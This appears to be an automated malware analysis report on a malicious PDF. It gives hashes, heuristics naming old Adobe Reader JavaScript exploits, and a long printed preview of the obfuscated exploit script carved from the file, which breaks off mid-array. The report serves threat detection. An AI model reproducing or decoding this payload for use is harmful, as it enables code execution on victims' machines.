PDF malware analysis — malicious · c70ad13bb3690498

MALICIOUS

PDF

6.6 KB First seen: 2026-05-10

MD5: 3c2a7a65c3bdffc2d83c16121ec37205 SHA-1: 69b12866e1b2266385393a9b38a67e3f91d02d1b SHA-256: c70ad13bb36904981360801be2d34d7e66a741a1945d4fce89cc39d37043ac3d

476 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream is obfuscated, as suggested by the PDF_FROMCHARCODE firing and the 'Script obfuscation indicators' triage signal. The deobfuscated JavaScript, legacy_pdfkit_stage_000.js, is likely responsible for downloading and executing a second-stage payload. The presence of obfuscated JavaScript within a PDF is a common technique for delivering malware.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 9

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927

PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH

A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT

One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

yR7R601K9="odBLW80q=[70,85,78,67,84,73,79,78,0,70,73,88,127,73,84,8,89,65,82,8"; yR7R601K9+= "3,80,12,76,69,78,9,91,87,72,73,76,69,8,89,65,82,83,80,14,"; yR7R601K9+= "76,69,78,71,84,72,10,18,28,76,69,78,9,91,89,65,82,83,80,1"; yR7R601K9+= "1,29,89,65,82,83,80,27,93,89,65,82,83,80,29,89,65,82,83,8"; yR7R601K9+= "0,14,83,85,66,83,84,82,73,78,71,8,16,12,76,69,78,15,18,9,"; yR7R601K9+= "27,82,69,84,85,82,78,0,89,65,82,83,80,27,93,45,42,70,85,7"; yR7R601K9+= "8,67,84,73,79,78,0,78,69,87,80,76,65,89,6 …

Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0039_000.js`	pdf-javascript-stream	PDF /JS object 39 at offset 0x16F	20865 bytes
SHA-256: `74683658e68c979555864b919c2198b87bb304ce10584613fe6f756903df7183`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script yR7R601K9="odBLW80q=[70,85,78,67,84,73,79,78,0,70,73,88,127,73,84,8,89,65,82,8"; yR7R601K9+= "3,80,12,76,69,78,9,91,87,72,73,76,69,8,89,65,82,83,80,14,"; yR7R601K9+= "76,69,78,71,84,72,10,18,28,76,69,78,9,91,89,65,82,83,80,1"; yR7R601K9+= "1,29,89,65,82,83,80,27,93,89,65,82,83,80,29,89,65,82,83,8"; yR7R601K9+= "0,14,83,85,66,83,84,82,73,78,71,8,16,12,76,69,78,15,18,9,"; yR7R601K9+= "27,82,69,84,85,82,78,0,89,65,82,83,80,27,93,45,42,70,85,7"; yR7R601K9+= "8,67,84,73,79,78,0,78,69,87,80,76,65,89,69,82,8,9,91,45,4"; yR7R601K9+= "2,86,65,82,0,83,72,69,76,76,67,79,68,69,0,29,0,85,78,69,8"; yR7R601K9+= "3,67,65,80,69,8,2,5,85,17,17,101,98,5,85,20,98,21,98,5,85"; yR7R601K9+= ",99,25,19,19,5,85,24,17,22,22,5,85,97,102,99,25,5,85,24,1"; yR7R601K9+= "6,16,17,5,85,16,98,19,20,5,85,101,18,97,22,5,85,101,98,10"; yR7R601K9+= "2,97,5,85,101,24,16,21,5,85,102,102,101,97,5,85,102,102,1"; yR7R601K9+= "02,102,5,85,23,99,20,102,5,85,97,22,97,22,5,85,102,25,97,"; yR7R601K9+= "22,5,85,16,23,99,18,5,85,97,22,25,22,5,85,97,22,97,22,5,8"; yR7R601K9+= "5,101,22,18,100,5,85,18,100,97,97,5,85,98,97,100,22,5,85,"; yR7R601K9+= "18,100,16,98,5,85,97,101,99,101,5,85,100,22,18,100,5,85,1"; yR7R601K9+= "8,100,24,22,5,85,18,22,97,22,5,85,99,100,25,24,5,85,21,21"; yR7R601K9+= ",100,19,5,85,101,16,101,16,5,85,25,24,18,22,5,85,100,19,9"; yR7R601K9+= "9,19,5,85,101,16,20,97,5,85,18,22,101,16,5,85,100,20,25,2"; yR7R601K9+= "4,5,85,21,17,100,19,5,85,101,16,101,16,5,85,25,24,18,22,5"; yR7R601K9+= ",85,100,19,99,24,5,85,18,100,21,22,5,85,99,99,21,17,5,85,"; yR7R601K9+= "102,102,97,21,5,85,102,100,20,101,5,85,97,22,97,22,5,85,2"; yR7R601K9+= "0,20,97,22,5,85,99,101,21,102,5,85,99,24,99,25,5,85,97,22"; yR7R601K9+= ",97,22,5,85,100,19,99,101,5,85,99,97,100,20,5,85,102,18,9"; yR7R601K9+= "9,98,5,85,98,16,21,25,5,85,20,101,18,100,5,85,101,19,20,1"; yR7R601K9+= "01,5,85,97,22,97,22,5,85,99,101,97,22,5,85,25,21,99,97,5,"; yR7R601K9+= "85,97,22,25,20,5,85,100,21,99,101,5,85,99,19,99,101,5,85,"; yR7R601K9+= "102,18,99,97,5,85,98,16,21,25,5,85,20,101,18,100,5,85,25,"; yR7R601K9+= "23,20,101,5,85,97,22,97,22,5,85,18,21,97,22,5,85,101,22,2"; yR7R601K9+= "0,97,5,85,23,97,18,100,5,85,99,99,102,21,5,85,21,25,101,2"; yR7R601K9+= "2,5,85,97,18,102,16,5,85,97,18,22,17,5,85,99,23,97,21,5,8"; yR7R601K9+= "5,99,19,24,24,5,85,99,16,100,101,5,85,101,18,22,17,5,85,9"; yR7R601K9+= "7,18,97,21,5,85,97,22,99,19,5,85,22,22,25,21,5,85,102,22,"; yR7R601K9+= "102,22,5,85,102,17,102,21,5,85,21,25,102,22,5,85,97,97,10"; yR7R601K9+= "2,16,5,85,23,97,18,100,5,85,102,22,102,22,5,85,102,21,102"; yR7R601K9+= ",22,5,85,102,22,102,22,5,85,102,16,21,25,5,85,21,25,98,22"; yR7R601K9+= ",5,85,97,101,102,16,5,85,102,16,102,23,5,85,100,19,18,100"; yR7R601K9+= ",5,85,18,100,25,97,5,85,24,24,100,18,5,85,97,21,100,101,5"; yR7R601K9+= ",85,102,16,21,19,5,85,100,16,18,100,5,85,97,21,24,22,5,85"; yR7R601K9+= ",25,21,21,19,5,85,101,102,22,102,5,85,16,98,101,23,5,85,2"; yR7R601K9+= "2,19,97,21,5,85,23,100,25,21,5,85,17,24,97,25,5,85,25,99,"; yR7R601K9+= "98,22,5,85,100,18,23,16,5,85,22,23,97,101,5,85,97,98,22,1"; yR7R601K9+= "00,5,85,23,99,97,21,5,85,20,100,101,22,5,85,25,100,21,23,"; yR7R601K9+= "5,85,100,19,98,25,5,85,102,24,20,17,5,85,102,24,18,100,5,"; yR7R601K9+= "85,97,21,24,18,5,85,99,16,23,98,5,85,97,97,18,100,5,85,18"; yR7R601K9+= ",100,101,100,5,85,98,97,102,24,5,85,23,98,97,21,5,85,97,1"; yR7R601K9+= "8,18,100,5,85,97,21,18,100,5,85,16,100,22,19,5,85,102,102"; yR7R601K9+= ",102,24,5,85,20,101,22,21,5,85,21,25,24,23,5,85,21,25,21,"; yR7R601K9+= "25,5,85,101,24,18,24,5,85,20,97,97,24,5,85,22,99,25,21,5,"; yR7R601K9+= "85,102,100,18,99,5,85,23,101,100,24,5,85,100,21,20,20,5,8"; yR7R601K9+= "5,98,99,25,16,5,85,100,22,24,25,5,85,17,100,102,24,5,85,9"; yR7R601K9+= "8,100,20,23,5,85,100,18,99,101,5,85,100,22,100,18,5,85,24"; yR7R601K9+= ",25,25,99,5,85,99,23,24,25,5,85,24,98,99,18,5,85,99,23,10"; yR7R601K9+= "0,102,5,85,99,18,99,24,5,85,100,101,99,19,5,85,99,21,24,2"; yR7R601K9+= "4,5,85,99,98,99,25,5,85,100,18,24,25,5,85,99,23,100,20,5,"; yR7R601K9+= "85,99,101,100,21,5,85,99,20,24,25,5,85,100,18,99,24,5,85,"; yR7R601K9+= "99,20,100,21,5,85,99,20,100,18,5,85,99,24,25,22,5,85,100,"; yR7R601K9+= "22,24,24,5,85,100,22,99,101,5,85,100,21,25,25,5,85,99,97,"; yR7R601K9+= "100,22,5,85,100,22,25,98,5,85,99,16,99,18,5,85,99,24,102,"; yR7R601K9+= "25,5,85,100,17,99,19,5,85,99,97,102,22,5,85,100,102,99,23"; yR7R601K9+= ",5,85,100,20,99,19,5,85,99,16,24,16,5,85,25,98,99,101,5,8"; yR7R601K9+= "5,16,16,97,22,2,9,27,45,42,86,65,82,0,66,76,79,67,75,0,29"; yR7R601K9+= ",0,85,78,69,83,67,65,80,69,8,2,5,85,16,67,16,67,5,85,16,6"; yR7R601K9+= "7,16,67,2,9,27,45,42,86,65,82,0,103,100,65,71,65,99,85,89"; yR7R601K9+= ",110,70,114,115,102,90,65,115,122,108,111,0,29,0,85,78,69"; yR7R601K9+= ",83,67,65,80,69,8,2,5,85,16,67,16,67,5,85,16,67,16,67,5,8"; yR7R601K9+= "5,16,67,16,67,5,85,16,67,16,67,5,85,16,67,16,67,5,85,16,6"; yR7R601K9+= "7,16,67,5,85,16,67,16,67,5,85,16,67,16,67,5,85,21,17,20,6"; yR7R601K9+= "9,5,85,20,24,22,21,5,85,20,24,20,20,5,85,23,18,20,70,5,85"; yR7R601K9+= ",20,65,22,69,5,85,22,68,20,19,5,85,20,66,21,17,5,85,20,66"; yR7R601K9+= ",23,25,5,85,23,17,21,22,5,85,20,68,20,17,5,85,21,25,20,20"; yR7R601K9+= ",5,85,21,25,22,66,5,85,23,25,23,25,5,85,22,18,21,65,5,85,"; yR7R601K9+= "22,18,22,70,5,85,23,65,22,69,5,85,22,19,20,69,5,85,20,65,"; yR7R601K9+= "20,68,5,85,22,19,20,17,5,85,22,18,21,19,5,85,20,17,21,20,"; yR7R601K9+= "5,85,21,22,23,16,5,85,21,21,20,19,5,85,20,18,23,19,5,85,2"; yR7R601K9+= "0,67,21,17,5,85,21,23,22,68,5,85,21,23,23,18,5,85,21,22,2"; yR7R601K9+= "3,16,2,9,27,45,42,87,72,73,76,69,8,66,76,79,67,75,14,76,6"; yR7R601K9+= "9,78,71,84,72,0,28,29,0,19,18,23,22,24,9,0,66,76,79,67,75"; yR7R601K9+= ",11,29,66,76,79,67,75,27,45,42,66,76,79,67,75,29,66,76,79"; yR7R601K9+= ",67,75,14,83,85,66,83,84,82,73,78,71,8,16,12,19,18,23,22,"; yR7R601K9+= "24,0,13,0,83,72,69,76,76,67,79,68,69,14,76,69,78,71,84,72"; yR7R601K9+= ",9,27,45,42,77,69,77,79,82,89,29,78,69,87,0,97,82,82,65,8"; yR7R601K9+= "9,8,9,27,70,79,82,8,73,29,16,27,73,28,16,88,18,16,16,16,2"; yR7R601K9+= "7,73,11,11,9,0,91,77,69,77,79,82,89,123,73,125,29,0,66,76"; yR7R601K9+= ",79,67,75,0,11,0,83,72,69,76,76,67,79,68,69,27,93,45,42,8"; yR7R601K9+= "5,84,73,76,14,80,82,73,78,84,68,8,2,82,76,80,112,80,74,11"; yR7R601K9+= "6,120,120,105,78,67,117,72,87,65,71,99,90,67,85,104,70,77"; yR7R601K9+= ",75,90,111,66,98,115,122,100,103,110,68,99,2,12,0,78,69,8"; yR7R601K9+= "7,0,100,65,84,69,8,9,9,27,45,42,85,84,73,76,14,80,82,73,7"; yR7R601K9+= "8,84,68,8,2,115,79,84,115,88,110,113,86,109,81,107,110,74"; yR7R601K9+= ",106,75,105,120,73,79,107,76,77,70,122,121,70,77,73,112,1"; yR7R601K9+= "03,71,103,110,110,107,78,2,12,0,78,69,87,0,100,65,84,69,8"; yR7R601K9+= ",9,9,27,45,42,84,82,89,0,91,84,72,73,83,14,77,69,68,73,65"; yR7R601K9+= ",14,78,69,87,112,76,65,89,69,82,8,78,85,76,76,9,27,93,0,6"; yR7R601K9+= "7,65,84,67,72,8,69,9,0,91,93,45,42,85,84,73,76,14,80,82,7"; yR7R601K9+= "3,78,84,68,8,103,100,65,71,65,99,85,89,110,70,114,115,102"; yR7R601K9+= ",90,65,115,122,108,111,12,0,78,69,87,0,100,65,84,69,8,9,9"; yR7R601K9+= ",27,93,45,42,45,42,70,85,78,67,84,73,79,78,0,67,79,76,76,"; yR7R601K9+= "65,66,127,69,77,65,73,76,8,9,91,86,65,82,0,83,72,69,76,76"; yR7R601K9+= ",67,79,68,69,29,85,78,69,83,67,65,80,69,8,2,5,85,17,17,10"; yR7R601K9+= "1,98,5,85,20,98,21,98,5,85,99,25,19,19,5,85,24,17,22,22,5"; yR7R601K9+= ",85,97,102,99,25,5,85,24,16,16,17,5,85,16,98,19,20,5,85,1"; yR7R601K9+= "01,18,97,22,5,85,101,98,102,97,5,85,101,24,16,21,5,85,102"; yR7R601K9+= ",102,101,97,5,85,102,102,102,102,5,85,23,99,20,102,5,85,9"; yR7R601K9+= "7,22,97,22,5,85,102,25,97,22,5,85,16,23,99,18,5,85,97,22,"; yR7R601K9+= "25,22,5,85,97,22,97,22,5,85,101,22,18,100,5,85,18,100,97,"; yR7R601K9+= "97,5,85,98,97,100,22,5,85,18,100,16,98,5,85,97,101,99,101"; yR7R601K9+= ",5,85,100,22,18,100,5,85,18,100,24,22,5,85,18,22,97,22,5,"; yR7R601K9+= "85,99,100,25,24,5,85,21,21,100,19,5,85,101,16,101,16,5,85"; yR7R601K9+= ",25,24,18,22,5,85,100,19,99,19,5,85,101,16,20,97,5,85,18,"; yR7R601K9+= "22,101,16,5,85,100,20,25,24,5,85,21,17,100,19,5,85,101,16"; yR7R601K9+= ",101,16,5,85,25,24,18,22,5,85,100,19,99,24,5,85,18,100,21"; yR7R601K9+= ",22,5,85,99,99,21,17,5,85,102,102,97,21,5,85,102,100,20,1"; yR7R601K9+= "01,5,85,97,22,97,22,5,85,20,20,97,22,5,85,99,101,21,102,5"; yR7R601K9+= ",85,99,24,99,25,5,85,97,22,97,22,5,85,100,19,99,101,5,85,"; yR7R601K9+= "99,97,100,20,5,85,102,18,99,98,5,85,98,16,21,25,5,85,20,1"; yR7R601K9+= "01,18,100,5,85,101,19,20,101,5,85,97,22,97,22,5,85,99,101"; yR7R601K9+= ",97,22,5,85,25,21,99,97,5,85,97,22,25,20,5,85,100,21,99,1"; yR7R601K9+= "01,5,85,99,19,99,101,5,85,102,18,99,97,5,85,98,16,21,25,5"; yR7R601K9+= ",85,20,101,18,100,5,85,25,23,20,101,5,85,97,22,97,22,5,85"; yR7R601K9+= ",18,21,97,22,5,85,101,22,20,97,5,85,23,97,18,100,5,85,99,"; yR7R601K9+= "99,102,21,5,85,21,25,101,22,5,85,97,18,102,16,5,85,97,18,"; yR7R601K9+= "22,17,5,85,99,23,97,21,5,85,99,19,24,24,5,85,99,16,100,10"; yR7R601K9+= "1,5,85,101,18,22,17,5,85,97,18,97,21,5,85,97,22,99,19,5,8"; yR7R601K9+= "5,22,22,25,21,5,85,102,22,102,22,5,85,102,17,102,21,5,85,"; yR7R601K9+= "21,25,102,22,5,85,97,97,102,16,5,85,23,97,18,100,5,85,102"; yR7R601K9+= ",22,102,22,5,85,102,21,102,22,5,85,102,22,102,22,5,85,102"; yR7R601K9+= ",16,21,25,5,85,21,25,98,22,5,85,97,101,102,16,5,85,102,16"; yR7R601K9+= ",102,23,5,85,100,19,18,100,5,85,18,100,25,97,5,85,24,24,1"; yR7R601K9+= "00,18,5,85,97,21,100,101,5,85,102,16,21,19,5,85,100,16,18"; yR7R601K9+= ",100,5,85,97,21,24,22,5,85,25,21,21,19,5,85,101,102,22,10"; yR7R601K9+= "2,5,85,16,98,101,23,5,85,22,19,97,21,5,85,23,100,25,21,5,"; yR7R601K9+= "85,17,24,97,25,5,85,25,99,98,22,5,85,100,18,23,16,5,85,22"; yR7R601K9+= ",23,97,101,5,85,97,98,22,100,5,85,23,99,97,21,5,85,20,100"; yR7R601K9+= ",101,22,5,85,25,100,21,23,5,85,100,19,98,25,5,85,102,24,2"; yR7R601K9+= "0,17,5,85,102,24,18,100,5,85,97,21,24,18,5,85,99,16,23,98"; yR7R601K9+= ",5,85,97,97,18,100,5,85,18,100,101,100,5,85,98,97,102,24,"; yR7R601K9+= "5,85,23,98,97,21,5,85,97,18,18,100,5,85,97,21,18,100,5,85"; yR7R601K9+= ",16,100,22,19,5,85,102,102,102,24,5,85,20,101,22,21,5,85,"; yR7R601K9+= "21,25,24,23,5,85,21,25,21,25,5,85,101,24,18,24,5,85,20,97"; yR7R601K9+= ",97,24,5,85,22,99,25,21,5,85,102,100,18,99,5,85,23,101,10"; yR7R601K9+= "0,24,5,85,100,21,20,20,5,85,98,99,25,16,5,85,100,22,24,25"; yR7R601K9+= ",5,85,17,100,102,24,5,85,98,100,20,23,5,85,100,18,99,101,"; yR7R601K9+= "5,85,100,22,100,18,5,85,24,25,25,99,5,85,99,23,24,25,5,85"; yR7R601K9+= ",24,98,99,18,5,85,99,23,100,102,5,85,99,18,99,24,5,85,100"; yR7R601K9+= ",101,99,19,5,85,99,21,24,24,5,85,99,98,99,25,5,85,100,18,"; yR7R601K9+= "24,25,5,85,99,23,100,20,5,85,99,101,100,21,5,85,99,20,24,"; yR7R601K9+= "25,5,85,100,18,99,24,5,85,99,20,100,21,5,85,99,20,100,18,"; yR7R601K9+= "5,85,99,24,25,22,5,85,100,22,24,24,5,85,100,22,99,101,5,8"; yR7R601K9+= "5,100,21,25,25,5,85,99,97,100,22,5,85,100,22,25,98,5,85,9"; yR7R601K9+= "9,16,99,18,5,85,99,19,102,25,5,85,99,23,99,98,5,85,99,97,"; yR7R601K9+= "99,102,5,85,99,16,24,16,5,85,25,98,99,101,5,85,16,16,97,2"; yR7R601K9+= "2,2,9,27,86,65,82,0,77,69,77,127,65,82,82,65,89,29,78,69,"; yR7R601K9+= "87,0,97,82,82,65,89,8,9,27,86,65,82,0,67,67,29,16,88,16,6"; yR7R601K9+= "7,16,67,16,67,16,67,27,86,65,82,0,65,68,68,82,29,16,88,20"; yR7R601K9+= ",16,16,16,16,16,27,86,65,82,0,83,67,127,76,69,78,29,83,72"; yR7R601K9+= ",69,76,76,67,79,68,69,14,76,69,78,71,84,72,10,18,27,86,65"; yR7R601K9+= ",82,0,76,69,78,29,65,68,68,82,13,8,83,67,127,76,69,78,11,"; yR7R601K9+= "16,88,19,24,9,27,86,65,82,0,89,65,82,83,80,29,85,78,69,83"; yR7R601K9+= ",67,65,80,69,8,2,5,85,25,16,25,16,5,85,25,16,25,16,2,9,27"; yR7R601K9+= ",89,65,82,83,80,29,70,73,88,127,73,84,8,89,65,82,83,80,12"; yR7R601K9+= ",76,69,78,9,27,86,65,82,0,67,79,85,78,84,18,29,8,67,67,13"; yR7R601K9+= ",16,88,20,16,16,16,16,16,9,15,65,68,68,82,27,70,79,82,8,8"; yR7R601K9+= "6,65,82,0,67,79,85,78,84,29,16,27,67,79,85,78,84,28,67,79"; yR7R601K9+= ",85,78,84,18,27,67,79,85,78,84,11,11,9,91,77,69,77,127,65"; yR7R601K9+= ",82,82,65,89,123,67,79,85,78,84,125,29,89,65,82,83,80,11,"; yR7R601K9+= "83,72,69,76,76,67,79,68,69,27,93,45,42,86,65,82,0,79,86,6"; yR7R601K9+= "9,82,70,76,79,87,29,85,78,69,83,67,65,80,69,8,2,5,85,16,6"; yR7R601K9+= "7,16,67,5,85,16,67,16,67,2,9,27,87,72,73,76,69,8,79,86,69"; yR7R601K9+= ",82,70,76,79,87,14,76,69,78,71,84,72,28,20,20,25,21,18,9,"; yR7R601K9+= "91,79,86,69,82,70,76,79,87,11,29,79,86,69,82,70,76,79,87,"; yR7R601K9+= "27,93,45,42,84,72,73,83,14,67,79,76,76,65,66,115,84,79,82"; yR7R601K9+= ",69,29,99,79,76,76,65,66,14,67,79,76,76,69,67,84,101,77,6"; yR7R601K9+= "5,73,76,105,78,70,79,8,91,83,85,66,74,26,2,2,12,77,83,71,"; yR7R601K9+= "26,79,86,69,82,70,76,79,87,93,9,27,93,45,42,45,42,70,85,7"; yR7R601K9+= "8,67,84,73,79,78,0,67,79,76,76,65,66,127,71,69,84,73,67,7"; yR7R601K9+= "9,78,8,9,91,73,70,8,65,80,80,14,68,79,67,14,99,79,76,76,6"; yR7R601K9+= "5,66,14,71,69,84,105,67,79,78,9,91,86,65,82,0,65,82,82,89"; yR7R601K9+= ",29,78,69,87,0,97,82,82,65,89,8,9,27,86,65,82,0,86,86,80,"; yR7R601K9+= "69,84,72,89,65,29,85,78,69,83,67,65,80,69,8,2,5,85,17,17,"; yR7R601K9+= "101,98,5,85,20,98,21,98,5,85,99,25,19,19,5,85,24,17,22,22"; yR7R601K9+= ",5,85,97,102,99,25,5,85,24,16,16,17,5,85,16,98,19,20,5,85"; yR7R601K9+= ",101,18,97,22,5,85,101,98,102,97,5,85,101,24,16,21,5,85,1"; yR7R601K9+= "02,102,101,97,5,85,102,102,102,102,5,85,23,99,20,102,5,85"; yR7R601K9+= ",97,22,97,22,5,85,102,25,97,22,5,85,16,23,99,18,5,85,97,2"; yR7R601K9+= "2,25,22,5,85,97,22,97,22,5,85,101,22,18,100,5,85,18,100,9"; yR7R601K9+= "7,97,5,85,98,97,100,22,5,85,18,100,16,98,5,85,97,101,99,1"; yR7R601K9+= "01,5,85,100,22,18,100,5,85,18,100,24,22,5,85,18,22,97,22,"; yR7R601K9+= "5,85,99,100,25,24,5,85,21,21,100,19,5,85,101,16,101,16,5,"; yR7R601K9+= "85,25,24,18,22,5,85,100,19,99,19,5,85,101,16,20,97,5,85,1"; yR7R601K9+= "8,22,101,16,5,85,100,20,25,24,5,85,21,17,100,19,5,85,101,"; yR7R601K9+= "16,101,16,5,85,25,24,18,22,5,85,100,19,99,24,5,85,18,100,"; yR7R601K9+= "21,22,5,85,99,99,21,17,5,85,102,102,97,21,5,85,102,100,20"; yR7R601K9+= ",101,5,85,97,22,97,22,5,85,20,20,97,22,5,85,99,101,21,102"; yR7R601K9+= ",5,85,99,24,99,25,5,85,97,22,97,22,5,85,100,19,99,101,5,8"; yR7R601K9+= "5,99,97,100,20,5,85,102,18,99,98,5,85,98,16,21,25,5,85,20"; yR7R601K9+= ",101,18,100,5,85,101,19,20,101,5,85,97,22,97,22,5,85,99,1"; yR7R601K9+= "01,97,22,5,85,25,21,99,97,5,85,97,22,25,20,5,85,100,21,99"; yR7R601K9+= ",101,5,85,99,19,99,101,5,85,102,18,99,97,5,85,98,16,21,25"; yR7R601K9+= ",5,85,20,101,18,100,5,85,25,23,20,101,5,85,97,22,97,22,5,"; yR7R601K9+= "85,18,21,97,22,5,85,101,22,20,97,5,85,23,97,18,100,5,85,9"; yR7R601K9+= "9,99,102,21,5,85,21,25,101,22,5,85,97,18,102,16,5,85,97,1"; yR7R601K9+= "8,22,17,5,85,99,23,97,21,5,85,99,19,24,24,5,85,99,16,100,"; yR7R601K9+= "101,5,85,101,18,22,17,5,85,97,18,97,21,5,85,97,22,99,19,5"; yR7R601K9+= ",85,22,22,25,21,5,85,102,22,102,22,5,85,102,17,102,21,5,8"; yR7R601K9+= "5,21,25,102,22,5,85,97,97,102,16,5,85,23,97,18,100,5,85,1"; yR7R601K9+= "02,22,102,22,5,85,102,21,102,22,5,85,102,22,102,22,5,85,1"; yR7R601K9+= "02,16,21,25,5,85,21,25,98,22,5,85,97,101,102,16,5,85,102,"; yR7R601K9+= "16,102,23,5,85,100,19,18,100,5,85,18,100,25,97,5,85,24,24"; yR7R601K9+= ",100,18,5,85,97,21,100,101,5,85,102,16,21,19,5,85,100,16,"; yR7R601K9+= "18,100,5,85,97,21,24,22,5,85,25,21,21,19,5,85,101,102,22,"; yR7R601K9+= "102,5,85,16,98,101,23,5,85,22,19,97,21,5,85,23,100,25,21,"; yR7R601K9+= "5,85,17,24,97,25,5,85,25,99,98,22,5,85,100,18,23,16,5,85,"; yR7R601K9+= "22,23,97,101,5,85,97,98,22,100,5,85,23,99,97,21,5,85,20,1"; yR7R601K9+= "00,101,22,5,85,25,100,21,23,5,85,100,19,98,25,5,85,102,24"; yR7R601K9+= ",20,17,5,85,102,24,18,100,5,85,97,21,24,18,5,85,99,16,23,"; yR7R601K9+= "98,5,85,97,97,18,100,5,85,18,100,101,100,5,85,98,97,102,2"; yR7R601K9+= "4,5,85,23,98,97,21,5,85,97,18,18,100,5,85,97,21,18,100,5,"; yR7R601K9+= "85,16,100,22,19,5,85,102,102,102,24,5,85,20,101,22,21,5,8"; yR7R601K9+= "5,21,25,24,23,5,85,21,25,21,25,5,85,101,24,18,24,5,85,20,"; yR7R601K9+= "97,97,24,5,85,22,99,25,21,5,85,102,100,18,99,5,85,23,101,"; yR7R601K9+= "100,24,5,85,100,21,20,20,5,85,98,99,25,16,5,85,100,22,24,"; yR7R601K9+= "25,5,85,17,100,102,24,5,85,98,100,20,23,5,85,100,18,99,10"; yR7R601K9+= "1,5,85,100,22,100,18,5,85,24,25,25,99,5,85,99,23,24,25,5,"; yR7R601K9+= "85,24,98,99,18,5,85,99,23,100,102,5,85,99,18,99,24,5,85,1"; yR7R601K9+= "00,101,99,19,5,85,99,21,24,24,5,85,99,98,99,25,5,85,100,1"; yR7R601K9+= "8,24,25,5,85,99,23,100,20,5,85,99,101,100,21,5,85,99,20,2"; yR7R601K9+= "4,25,5,85,100,18,99,24,5,85,99,20,100,21,5,85,99,20,100,1"; yR7R601K9+= "8,5,85,99,24,25,22,5,85,100,22,24,24,5,85,100,22,99,101,5"; yR7R601K9+= ",85,100,21,25,25,5,85,99,97,100,22,5,85,100,22,25,98,5,85"; yR7R601K9+= ",99,16,99,18,5,85,99,17,102,25,5,85,100,18,99,19,5,85,99,"; yR7R601K9+= "21,99,102,5,85,99,24,99,25,5,85,99,16,24,16,5,85,25,98,99"; yR7R601K9+= ",101,5,85,16,16,97,22,2,9,27,86,65,82,0,72,119,81,21,16,1"; yR7R601K9+= "6,99,110,29,86,86,80,69,84,72,89,65,14,76,69,78,71,84,72,"; yR7R601K9+= "10,18,27,86,65,82,0,76,69,78,29,16,88,20,16,16,16,16,16,1"; yR7R601K9+= "3,8,72,119,81,21,16,16,99,110,11,16,88,19,24,9,27,86,65,8"; yR7R601K9+= "2,0,89,65,82,83,80,29,85,78,69,83,67,65,80,69,8,2,5,85,25"; yR7R601K9+= ",16,25,16,5,85,25,16,25,16,2,9,27,89,65,82,83,80,29,70,73"; yR7R601K9+= ",88,127,73,84,8,89,65,82,83,80,12,76,69,78,9,27,86,65,82,"; yR7R601K9+= "0,80,21,97,74,107,22,21,70,29,8,16,88,16,67,16,67,16,67,1"; yR7R601K9+= "6,67,13,16,88,20,16,16,16,16,16,9,15,16,88,20,16,16,16,16"; yR7R601K9+= ",16,27,70,79,82,8,86,65,82,0,86,81,67,113,100,25,22,89,29"; yR7R601K9+= ",16,27,86,81,67,113,100,25,22,89,28,80,21,97,74,107,22,21"; yR7R601K9+= ",70,27,86,81,67,113,100,25,22,89,11,11,9,91,65,82,82,89,1"; yR7R601K9+= "23,86,81,67,113,100,25,22,89,125,29,89,65,82,83,80,11,86,"; yR7R601K9+= "86,80,69,84,72,89,65,27,93,45,42,86,65,82,0,84,117,109,72"; yR7R601K9+= ",110,66,103,87,29,85,78,69,83,67,65,80,69,8,2,5,16,25,2,9"; yR7R601K9+= ",27,87,72,73,76,69,8,84,117,109,72,110,66,103,87,14,76,69"; yR7R601K9+= ",78,71,84,72,28,16,88,20,16,16,16,9,91,84,117,109,72,110,"; yR7R601K9+= "66,103,87,11,29,84,117,109,72,110,66,103,87,27,93,45,42,8"; yR7R601K9+= "4,117,109,72,110,66,103,87,29,2,110,14,2,11,84,117,109,72"; yR7R601K9+= ",110,66,103,87,27,65,80,80,14,68,79,67,14,99,79,76,76,65,"; yR7R601K9+= "66,14,71,69,84,105,67,79,78,8,84,117,109,72,110,66,103,87"; yR7R601K9+= ",9,27,93,93,45,42,45,42,70,85,78,67,84,73,79,78,0,80,68,7"; 